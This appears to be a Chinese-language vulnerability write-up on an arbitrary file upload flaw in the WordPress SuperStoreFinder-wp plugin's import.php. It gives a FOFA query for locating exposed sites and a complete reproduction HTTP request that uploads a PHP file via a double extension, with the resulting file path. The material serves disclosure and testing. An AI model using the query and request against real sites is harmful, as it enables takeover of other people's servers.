登录 白背景

WordPress SuperStoreFinder-wp 插件 import.php 任意文件上传漏洞

一、漏洞简介

WordPress和WordPress plugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台,该平台支持在PHP和MySQL的服务器上架设个人博客网站。WordPress SuperStoreFinder-wp 是一款内置了精确的地理位置,让客户以最简单的方式路由和到达您的商店网点的插件。WordPress SuperStoreFinder-wp 插件没有正确检查文件上传,攻击者可以将Content-Type标头设置为text/csv,并使用双扩展来绕过现有的检查,攻击者可上传恶意文件获取服务器权限。

二、影响版本

  • WordPress SuperStoreFinder-wp

三、资产测绘

  • fofabody="wp-content/plugins/superstorefinder-wp"
  • 特征

1711276977635-b8fe060b-0e99-48ae-b5d8-1056b64c4676.png

四、漏洞复现

POST /wp-content/plugins/superstorefinder-wp/ssf-wp-admin/pages/import.php HTTP/1.1
Host: 
Content-Type: multipart/form-data; boundary=------WebKitFormBoundarybqvzqvmt
User-Agent: Mozilla/5.0 

------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="default_location"; filename="test.csv.php"
Content-Type: text/csv

<?php echo md5(123);unlink(__FILE__);?>
------WebKitFormBoundarybqvzqvmt

1712420535935-3a49c144-91ab-4230-a7d3-2978189270ae.png

文件上传位置

/wp-content/plugins/superstorefinder-wp/ssf-wp-admin/test.csv.php

1712420560237-83aa50ff-459b-4ebb-a683-0db5e9fdcb6d.png

原文: https://www.yuque.com/xiaokp7/ocvun2/eyr9ya4fdxsdynkw